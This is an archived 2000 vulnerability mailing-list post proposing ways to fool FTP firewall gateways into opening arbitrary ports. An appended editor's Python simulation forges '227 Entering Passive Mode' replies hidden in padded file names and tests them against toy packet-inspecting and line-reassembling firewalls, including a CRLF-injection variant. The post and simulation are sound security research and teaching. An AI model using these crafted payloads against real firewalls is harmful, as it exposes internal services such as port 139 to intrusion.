Vulnerability Development mailing list archives
Breaking through FTP ALGs -- is it possible?
From: mikael.olsson () ENTERNET SE (Mikael Olsson)
Date: Tue, 8 Feb 2000 11:10:03 +0100
Hi all,

I've been having this idea for a while, but I've never gotten around to testing it to see if it actually works.

The low-down of it is fooling a firewall into opening "a TCP port of your choice" against an FTP server. Or, if you're running an evil FTP server, having it open ports against clients accessing the server.

There are several "flaws" and assumptions in this idea, so it is likely to NOT work with several FTP servers and firewalls. On the other hand, it might work with some :-)

Now, for the idea:

Assume we're accessing an FTP server that is protected by a firewall of some kind. The firewall is monitoring our command channel, port 21, for "PASV" messages sent by the server. Upon receipt of such messages, it will open a channel to the port number specified in the message.

Now, what if we'd be able to send fake "PASV" messages to the server, and have it echo them out through the firewall? We'd be able to access arbitrary TCP ports on the FTP server. (23, 139, 6000? :-)

Breaking through a stateful inspection FTP ALG
----------------------------------------------

One of the ideas I'm having has to do with stateful inspection firewalls. I'm thinking that most of them don't reassemble the connection completely, but rather trust that the FTP server will send the "PASV" message as the first string in a new packet - this is usually what will happen?

What if we "get" a file called

AAAAAAA[about 100 A]AAAAPASV 123, 123, 123, 123, 0, 139

where "123, 123, 123, 123" is the public address of the FTP server. It is somewhat likely that the FTP server will send us an error message stating that this file name is illegal.

Now, WHAT if we were to decrease the TCP MSS in this connection (easily done) to something like.... 100 bytes? Wouldn't we be able to calculate just how many 'A's we'd have to add to the beginning of the file name until the "PASV" command becomes the first string in the packet following the error message with all the 'A's?

Wouldn't the firewall then obey our fake PASV command that the server just echoed for us?

Of course, you might get lots of garbage after the echoed PASV command, like a trailing quote and maybe bits and pieces of the error message. But that might not matter, I think. (Assuming that the firewall simply does something along the lines of sscanf() to get the parameters after having found the "PASV" text in the beginning of the packet.)

This all assumes that the firewall isn't completely reassembling the stream, but rather looking at the contents of individual packets. This is why I haven't gotten around to testing my idea; you'd have to try it on several different firewalls and see if it has a chance of working.

Breaking through a "proxy" FTP ALG
----------------------------------

There's another case here, and that is where the firewall completely reassembles the TCP stream before analyzing it. Call it a "proxy", call it whatever.

This is a LOT harder, but it could maybe work with some FTP servers? You'd have to be able to coax the FTP server into sending multiple lines (CRLF terminated) in order to have it look like a real PASV command. You might also have to mimic a legitimate GET request from the client before having the firewall accept the PASV command from the server.

As I said, this is nowhere near easy, but I trust someone here will come up with an FTP server that can be coaxed into doing this, and a way to fool the firewall :-)

Breaking through to a client
----------------------------

This is not as feasible an attack. You'd have to have an FTP server of your own, and make people connect to it. (As if this can't be done by mailing HTML mail to people containing an IMG SRC pointing to an FTP location?)

Anyhow, applying all the theory above with different types of firewall, it ought to be possible to make the client echo bogus "PORT" commands, which the firewall would interpret and result in ports being opened through the firewall.

This is nowhere near as likely as the server cases above, I know. It is a lot more likely that you might coax a server into echoing things than fooling a client into echoing things. I'll also leave this idea in your capable hands, people :-)

OH, by the way. Another thing about the server cases above. If the firewall accepts any IP address in the PASV command from the server, not just the address of the FTP server itself, you might be able to fool the firewall into opening holes to pretty much any server and port behind it. (Long shot, I know)

/Mike
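The segment-alignment trick described in the post, as an added example written by the editor and not part of Mikael's message or any real product: a small Python simulation of the server's echoed error reply, the TCP segmentation at a reduced MSS, and two toy ALG models, one that matches only the start of each packet and one that reassembles the stream and matches complete CRLF-terminated lines. Everything here is an assumption and is labelled as such in the code: the hypothetical server echoes the requested name verbatim inside a `550` reply; the reply starts on a segment boundary (in practice you would read the server's TCP sequence number to find the offset); and the firewall is modelled as watching for the server's `227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)` reply, which is what a real server sends in answer to PASV (RFC 959), rather than for the literal text "PASV". The same block also covers the "proxy" section, with a constructed server that lets CRLF through in the echoed name and so defeats the line-reassembling model too, and the closing remark about firewalls that accept any address in the reply, via the `check_ip` flag.

```python
import re

# Constructed server behaviour (assumption): the hypothetical server echoes the
# requested name verbatim inside a 550 error reply. Real servers differ.
ERROR_PREFIX = b"550 "
ERROR_SUFFIX = b": No such file or directory\r\n"


def server_error_reply(filename: bytes) -> bytes:
    """Reply the hypothetical server sends for a bad RETR/GET of `filename`."""
    return ERROR_PREFIX + filename + ERROR_SUFFIX


def segment(stream: bytes, mss: int):
    """Split the server's byte stream into MSS-sized TCP segments.

    Assumes the reply begins on a segment boundary; an attacker would read
    the stream offset from the server's TCP sequence numbers instead.
    """
    return [stream[i:i + mss] for i in range(0, len(stream), mss)]


# What the firewall is really looking for: the server's reply to PASV,
# "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" per RFC 959.
PASV_RE = re.compile(rb"^227[^(]*\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def _parse_pasv(text: bytes):
    """sscanf()-style parse: accept a 227 line at the start of `text`,
    ignore whatever trailing garbage follows the closing parenthesis."""
    m = PASV_RE.match(text)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def packet_alg(segments, server_ip: str, check_ip: bool = True):
    """Toy stateful-inspection ALG: inspects only the start of each packet.
    Returns the (ip, port) pairs it would open through the firewall."""
    opened = []
    for seg in segments:
        hit = _parse_pasv(seg)
        if hit and (not check_ip or hit[0] == server_ip):
            opened.append(hit)
    return opened


def line_alg(stream: bytes, server_ip: str, check_ip: bool = True):
    """Toy proxy-style ALG: reassembles the stream and matches whole CRLF lines."""
    opened = []
    for line in stream.split(b"\r\n"):
        hit = _parse_pasv(line)
        if hit and (not check_ip or hit[0] == server_ip):
            opened.append(hit)
    return opened


def fake_pasv(ip: str, port: int) -> bytes:
    """Forge the 227 reply we want the server to echo for us."""
    host = ip.replace(".", ",").encode()
    return b"227 Entering Passive Mode (%s,%d,%d)" % (host, port // 256, port % 256)


def craft_filename(fake: bytes, mss: int, prefix_len: int = len(ERROR_PREFIX)) -> bytes:
    """Pad with 'A's so `fake` lands at offset k*mss in the server's reply,
    i.e. at the first byte of a TCP segment. With a 4-byte "550 " prefix and
    mss=100 that is 96 bytes of padding."""
    pad = (-prefix_len) % mss
    return b"A" * pad + fake


def run_attack(server_ip: str, target_port: int, mss: int):
    """Drive the whole scenario; returns what each ALG model would open."""
    filename = craft_filename(fake_pasv(server_ip, target_port), mss)
    stream = server_error_reply(filename)
    return packet_alg(segment(stream, mss), server_ip), line_alg(stream, server_ip)


if __name__ == "__main__":
    per_packet, per_line = run_attack("123.123.123.123", 139, 100)
    print("packet-inspecting ALG opens:", per_packet)   # [('123.123.123.123', 139)]
    print("line-reassembling ALG opens:", per_line)     # []
    # Hypothetical server that does not strip CRLF from the echoed name:
    crlf_stream = server_error_reply(b"x\r\n" + fake_pasv("123.123.123.123", 139))
    print("line ALG vs CRLF-echoing server:", line_alg(crlf_stream, "123.123.123.123"))
```

The per-packet model falls to the padding alone, which is the post's first case; the line-reassembling model only falls when the server can be made to emit the forged reply as its own CRLF-terminated line, which is the post's second, harder case. Dropping `check_ip` reproduces the last remark: a firewall that does not pin the address to the FTP server's own would open the forged port on any host behind it.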